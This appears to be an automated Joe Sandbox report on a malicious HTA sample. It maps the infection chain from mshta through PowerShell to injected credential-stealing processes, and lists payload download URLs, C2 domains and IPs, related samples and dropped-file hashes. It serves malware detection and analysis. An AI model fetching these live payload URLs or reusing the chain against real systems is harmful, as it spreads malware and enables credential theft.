                      Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      Source: Yara match | File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | 111 Scripting | Valid Accounts | 11 Command and Scripting Interpreter | 111 Scripting | 512 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 11 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 31 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 512 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Behavior Graph ID: 1568211 | Sample: bestimylover.hta | Startdate: 04/12/2024 | Architecture: WINDOWS | Score: 100
                      Network: www.sql.dance; www.enoughmoney.online; 3 other IPs or domains
                      Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 12 other signatures
                      mshta.exe 1 (started)
                        Signatures: Suspicious command line found; PowerShell case anomaly found
                        cmd.exe 1 (started)
                          Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found
                          conhost.exe (started)
                          powershell.exe 3 44 (started)
                            Network: 107.172.44.175, 49704, 49709, 80, AS-COLOCROSSINGUS, United States
                            Dropped: nightridingisreall...lentiretimeforn.vbS, Unicode
                            Dropped: C:\Users\user\AppData\...\hfoj0pnm.cmdline, Unicode
                            Signatures: Loading BitLocker PowerShell Module
                            csc.exe 3 (started)
                              Dropped: C:\Users\user\AppData\Local\...\hfoj0pnm.dll, PE32
                              cvtres.exe 1 (started)
                            wscript.exe 1 (started)
                              Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
                              powershell.exe 15 16 (started)
                                Network: cloudinary.map.fastly.net, 151.101.129.137, 443, 49705, FASTLYUS, United States
                                Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                                conhost.exe (started)
                                aspnet_compiler.exe (started)
                                aspnet_compiler.exe (started)
                                  Signatures: Maps a DLL or memory area into another process
                                  HDLzkMKGEKBh.exe (injected)
                                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                                    msinfo32.exe 13 (started)
                                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                      firefox.exe (started)
                                      HDLzkMKGEKBh.exe (injected)
                                        Network: www.cifasnc.info, 172.67.128.109, 49764, 49771, 49777, CLOUDFLARENETUS, United States
                                        Network: www.enoughmoney.online, 172.67.150.211, 49723, 80, CLOUDFLARENETUS, United States
                                        Network: www.sql.dance, 199.59.243.227, 49800, 49810, 49816, BODIS-NJUS, United States
                                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)

                      Source | Detection | Scanner | Label
                      bestimylover.hta | 18% | ReversingLabs | Script-WScript.Trojan.Asthma
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF | 0% | Avira URL Cloud | safe
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFFD | 0% | Avira URL Cloud | safe
                      http://107.172.44.175/244/nightr | 0% | Avira URL Cloud | safe
                      http://107.172.44.175/244/RFGDF.txt | 100% | Avira URL Cloud | malware
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF; | 0% | Avira URL Cloud | safe
                      http://cifasnc.info/wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ | 0% | Avira URL Cloud | safe
                      http://www.cifasnc.info/wl1d/ | 0% | Avira URL Cloud | safe
                      http://www.sql.dance | 0% | Avira URL Cloud | safe
                      http://www.enoughmoney.online/r72u/?-DiH=2XvD5&CJE8V=GItYwatNh5Xk+Q2MTg9ApsiGHoFk1E90IzupkRdOfJqts8zyaMFRFG2wZpK3L9f87JrBtQZPR7+NA6TbtORZfIe2HAOWLNTCJkmVcfUZGPKfL9xE/oouBrRom1yDfEIfZg== | 0% | Avira URL Cloud | safe
                      http://www.sql.dance/9p84/ | 0% | Avira URL Cloud | safe
                      http://www.sql.dance/9p84/?CJE8V=sVrHaezIocwvk586NbKL/ZmiafOvpGHuxCd8uk51gcnLQEXEQAeULabxZfXafDaZqd/22GpcW/h9erqwiYl6Kq4oLeU8CyaDpPEVNRKQpnjvGs8eQi8Qsuigmn/6Gj17jw==&-DiH=2XvD5 | 0% | Avira URL Cloud | safe
                      http://cifasnc.info/xmlrpc.php | 0% | Avira URL Cloud | safe
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      www.enoughmoney.online | 172.67.150.211 | true | true | | unknown
                      www.sql.dance | 199.59.243.227 | true | true | | unknown
                      www.cifasnc.info | 172.67.128.109 | true | true | | unknown
                      cloudinary.map.fastly.net | 151.101.129.137 | true | false | | high
                      res.cloudinary.com | unknown | unknown | false | | high
                      Name | Malicious | Antivirus Detection | Reputation
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF | true | Avira URL Cloud: safe | unknown
                      http://www.cifasnc.info/wl1d/ | true | Avira URL Cloud: safe | unknown
                      http://107.172.44.175/244/RFGDF.txt | true | Avira URL Cloud: malware | unknown
                      http://www.sql.dance/9p84/ | true | Avira URL Cloud: safe | unknown
                      http://www.enoughmoney.online/r72u/?-DiH=2XvD5&CJE8V=GItYwatNh5Xk+Q2MTg9ApsiGHoFk1E90IzupkRdOfJqts8zyaMFRFG2wZpK3L9f87JrBtQZPR7+NA6TbtORZfIe2HAOWLNTCJkmVcfUZGPKfL9xE/oouBrRom1yDfEIfZg== | true | Avira URL Cloud: safe | unknown
                      http://www.sql.dance/9p84/?CJE8V=sVrHaezIocwvk586NbKL/ZmiafOvpGHuxCd8uk51gcnLQEXEQAeULabxZfXafDaZqd/22GpcW/h9erqwiYl6Kq4oLeU8CyaDpPEVNRKQpnjvGs8eQi8Qsuigmn/6Gj17jw==&-DiH=2XvD5 | true | Avira URL Cloud: safe | unknown
                      https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg | false | | high
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://duckduckgo.com/chrome_newtab | msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1545943056.000000000605B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://duckduckgo.com/ac/?q= | msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://contoso.com/License | powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://contoso.com/Icon | powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://cifasnc.info/wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ | msinfo32.exe, 00000010.00000002.2659047347.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2658455392.0000000002DA6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://107.172.44.175/244/nightr | powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFFD | powershell.exe, 00000003.00000002.1547598476.00000000077BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://www.ecosia.org/newtab/ | msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://ac.ecosia.org/autocomplete?q= | msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://res.cloudinary.com | powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt | powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.1544480434.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000004E71000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://contoso.com/ | powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1545943056.000000000605B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF; | powershell.exe, 00000003.00000002.1547598476.00000000077BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://www.sql.dance | HDLzkMKGEKBh.exe, 00000011.00000002.2660016634.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://cifasnc.info/xmlrpc.php | msinfo32.exe, 00000010.00000002.2659047347.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2658455392.0000000002DA6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1544480434.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000004E71000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      172.67.128.109 | www.cifasnc.info | United States | 13335 | CLOUDFLARENETUS | true
                      151.101.129.137 | cloudinary.map.fastly.net | United States | 54113 | FASTLYUS | false
                      107.172.44.175 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
                      199.59.243.227 | www.sql.dance | United States | 395082 | BODIS-NJUS | true
                      172.67.150.211 | www.enoughmoney.online | United States | 13335 | CLOUDFLARENETUS | true
                      Joe Sandbox version: 41.0.0 Charoite
                      Analysis ID: 1568211
                      Start date and time: 2024-12-04 13:07:14 +01:00
                      Joe Sandbox product: CloudBasic
                      Overall analysis duration: 0h 9m 32s
                      Hypervisor based Inspection enabled: false
                      Report type: full
                      Cookbook file name: default.jbs
                      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed: 19
                      Number of new started drivers analysed: 0
                      Number of existing processes analysed: 0
                      Number of existing drivers analysed: 0
                      Number of injected processes analysed: 2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode: default
                      Analysis stop reason: Timeout
                      Sample name: bestimylover.hta
                      Detection: MAL
                      Classification: mal100.phis.troj.spyw.expl.evad.winHTA@23/17@4/5
                                                                                EGA Information:
                                                                                • Successful, ratio: 66.7%
                                                                                HCA Information:
                                                                                • Successful, ratio: 87%
                                                                                • Number of executed functions: 85
                                                                                • Number of non-executed functions: 235
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .hta
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target mshta.exe, PID 4080 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: bestimylover.hta
                      Time | Type | Description
                      07:08:15 | API Interceptor | 105x Sleep call for process: powershell.exe modified
                      07:09:58 | API Interceptor | 15x Sleep call for process: msinfo32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
151.101.129.137 | nicpeoplesideasgivenforme.hta | malicious | Cobalt Strike, HTMLPhisher |
151.101.129.137 | https://0azeevmdi7.codedesign.app/ | malicious | Unknown |
151.101.129.137 | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | malicious | Unknown |
151.101.129.137 | Steelcase Series 1 Sustainable Office Chair _ Steelcase.html | malicious | Unknown |
151.101.129.137 | https://jenifer-lopezz.pages.dev/ | malicious | Unknown |
151.101.129.137 | https://bookme.name/simonmed/us | malicious | HtmlDropper, HTMLPhisher |
151.101.129.137 | https://asset.cloudinary.com/dclug8dsh/490e37baf41d2124fee1d1d5aeaf2423 | malicious | HTMLPhisher |
151.101.129.137 | https://ipfs.io/ipfs/QmWNYr2ZzUpnCe5o76MxsXMmnPtnt9FdDo7zmRz6FaMzeu#hresource@archphila.org | malicious | HTMLPhisher |
151.101.129.137 | https://www.searchunify.com | malicious | Unknown |
151.101.129.137 | https://searchunify.com | malicious | Unknown |
107.172.44.175 | Shipping Document.xla.xlsx | malicious | HTMLPhisher | 107.172.44.175/1321/CAMRM.txt
107.172.44.175 | Shipping Document.xls | malicious | HTMLPhisher | 107.172.44.175/1311/we/seethebestthingsgoodforentireattitudewhoputonmyheartsheismysweetbebay.hta
107.172.44.175 | Document.xla.xlsx | malicious | FormBook, HTMLPhisher | 107.172.44.175/31/RFVGG.txt
107.172.44.175 | Document.xla.xlsx | malicious | Unknown | 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
107.172.44.175 | Document.xla.xlsx | malicious | Unknown | 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
107.172.44.175 | Document.xla.xlsx | malicious | Unknown | 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
199.59.243.227 | SW_5724.exe | malicious | FormBook | www.whisperart.net/27s6/
199.59.243.227 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590
199.59.243.227 | 1k24tbb-00241346.exe | malicious | FormBook, PureLog Stealer | www.honk.city/c8xp/
199.59.243.227 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.bcg.services/xz45/
199.59.243.227 | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | www.acond-22-mvr.click/w9z4/
199.59.243.227 | FATURA.exe | malicious | FormBook | www.timetime.store/wxr5/
199.59.243.227 | Quotation sheet.exe | malicious | FormBook, PureLog Stealer | www.acond-22-mvr.click/w9z4/
199.59.243.227 | file.exe | malicious | FormBook, PureLog Stealer | www.honk.city/c8xp/
199.59.243.227 | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | www.oztalkshw.store/3agz/
199.59.243.227 | file.exe | malicious | FormBook | www.whisperart.net/rfcw/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cloudinary.map.fastly.net | nicpeoplesideasgivenforme.hta | malicious | Cobalt Strike, HTMLPhisher | 151.101.129.137
cloudinary.map.fastly.net | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | malicious | Remcos | 151.101.1.137
cloudinary.map.fastly.net | nr101612_Order.wsf | malicious | Remcos | 151.101.1.137
cloudinary.map.fastly.net | https://0azeevmdi7.codedesign.app/ | malicious | Unknown | 151.101.129.137
cloudinary.map.fastly.net | LBzGgy6rnu.doc | malicious | Remcos | 151.101.65.137
cloudinary.map.fastly.net | 0200011080.xls | malicious | Remcos, HTMLPhisher | 151.101.65.137
cloudinary.map.fastly.net | 1013911.js | malicious | FormBook | 151.101.1.137
cloudinary.map.fastly.net | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | malicious | Unknown | 151.101.129.137
cloudinary.map.fastly.net | Steelcase Series 1 Sustainable Office Chair _ Steelcase.html | malicious | Unknown | 151.101.129.137
cloudinary.map.fastly.net | https://jenifer-lopezz.pages.dev/ | malicious | Unknown | 151.101.129.137
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | http://johnlewis.site | malicious | Unknown | 151.101.65.229
FASTLYUS | nicpeoplesideasgivenforme.hta | malicious | Cobalt Strike, HTMLPhisher | 151.101.129.137
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.129.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.193.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.129.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.193.91
FASTLYUS | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | malicious | Remcos | 151.101.1.137
FASTLYUS | https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cec | malicious | Unknown | 151.101.194.208
CLOUDFLARENETUS | http://johnlewis.site | malicious | Unknown | 162.159.140.98
CLOUDFLARENETUS | PO 4110007694.exe | malicious | FormBook | 104.21.57.248
CLOUDFLARENETUS | fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
CLOUDFLARENETUS | https://ammyy.com/en/downloads.html | malicious | Flawedammyy | 162.159.61.3
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | Advertising Agreement for Youtube Cooperation.scr | malicious | LummaC Stealer | 104.21.33.143
CLOUDFLARENETUS | Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat | malicious | Unknown | 104.21.36.187
CLOUDFLARENETUS | fUHl7rElXU.xlsx | malicious | Unknown | 188.114.97.6
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | letter_olivia.law_mercerhole.co.uk.pdf | malicious | HTMLPhisher | 172.67.149.151
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | nicpeoplesideasgivenforme.hta | malicious | Cobalt Strike, HTMLPhisher | 151.101.129.137
3b5074b1b5d032e5620f69f9f700ff0e | nicetomeetyougreatthignsgivenmeback.hta | malicious | Cobalt Strike, HTMLPhisher | 151.101.129.137
3b5074b1b5d032e5620f69f9f700ff0e | fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exe | malicious | Snake Keylogger, VIP Keylogger | 151.101.129.137
3b5074b1b5d032e5620f69f9f700ff0e | Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat | malicious | Unknown | 151.101.129.137
3b5074b1b5d032e5620f69f9f700ff0e | Order_DEC2024.wsf | malicious | Remcos | 151.101.129.137
3b5074b1b5d032e5620f69f9f700ff0e | Bank Swift and SOA PRN0072003410853_pdf.exe | malicious | GuLoader, MassLogger RAT | 151.101.129.137
3b5074b1b5d032e5620f69f9f700ff0e | lnvoice-1620804301.pdf .js | malicious | RHADAMANTHYS | 151.101.129.137
3b5074b1b5d032e5620f69f9f700ff0e | lnvoice-1620804301.pdf (1).js | malicious | RHADAMANTHYS | 151.101.129.137
3b5074b1b5d032e5620f69f9f700ff0e | Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.eml | malicious | Unknown | 151.101.129.137
                                                                                                    No context
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (3266), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):154108
                                                                                                    Entropy (8bit):3.80902206387575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Y53KPX3LVRMFTHvqq53KPX3LVRMF153KPX3LVRMF6:lPLVGFqPLVGFWPLVGF6
                                                                                                    MD5:714404045E7841CEBE0302E177C6CD3D
                                                                                                    SHA1:22EFC9796C48BA9527219AB6118E71D1CD9DA729
                                                                                                    SHA-256:EF6B11FE955BC7F2064CAD480851792FC6E9625325B32480252300BE1FEBA8DE
                                                                                                    SHA-512:D30E94AEFD53EAECB533AFC02E104370B93FBFD8767ECE8B663AF7F48E312EC37AB4C99243CC3A1995D4B2C5B08DA780DE0EA85BB041EA85F9C33B6039C97133
                                                                                                    Malicious:false
                                                                                                    Preview:...... . . . .....L.L.k.b.p.i.l.u.b.L.v.f.A.b.K. .=. .".K.c.a.i.s.I.I.o.A.P.L.d.B.K.i.".....N.G.Z.K.J.L.K.W.K.q.N.t.i.U.G. .=. .".L.Z.A.z.R.b.A.Z.x.c.K.f.b.i.Z.".....b.g.A.A.P.i.W.K.h.I.f.G.L.P.G. .=. .".t.p.m.r.i.o.c.k.W.C.d.i.l.U.I.".........W.n.q.k.f.L.B.L.i.A.s.o.S.z.W. .=. .".N.o.O.N.P.q.K.L.O.G.d.h.W.c.n.".....k.m.p.L.R.i.m.s.r.m.K.k.P.p.Z. .=. .".Q.W.u.Z.m.c.Z.i.q.K.B.x.c.s.k.".....o.T.i.c.b.L.L.B.N.i.i.U.i.A.N. .=. .".f.i.e.l.p.d.k.z.a.j.j.i.l.i.W.".....L.W.G.R.N.p.W.L.c.Z.f.G.K.J.h. .=. .".L.G.f.T.K.C.Z.v.N.L.A.e.b.L.b.".....r.L.C.L.q.d.G.g.L.K.u.W.K.n.o. .=. .".s.H.K.i.C.c.W.U.c.C.A.k.W.O.m.".....m.p.f.d.c.J.f.U.j.I.g.U.W.e.o. .=. .".i.p.o.c.U.p.S.k.e.i.t.l.c.W.k.".....r.K.d.u.G.S.q.p.H.K.L.O.Z.l.U. .=. .".I.L.G.b.o.h.G.K.Z.W.L.p.f.O.i.".....G.g.h.m.H.u.a.m.H.k.a.C.G.p.d. .=. .".m.p.U.h.z.i.i.i.Z.R.W.W.p.c.P.".....N.B.Z.Z.K.z.m.P.i.L.k.L.d.G.L. .=. .".f.a.o.R.i.i.Z.N.W.W.h.d.G.Q.C.".....C.j.v.Z.L.L.K.n.f.P.f.t.o.G.b. .=. .".L.N.O.P.A.f.h.W.p.m.n.g.K.h.h.".....O.Z.h.f.S.f.e.x.
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5829
                                                                                                    Entropy (8bit):4.901113710259376
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1172
                                                                                                    Entropy (8bit):5.344931650926746
                                                                                                    Encrypted:false
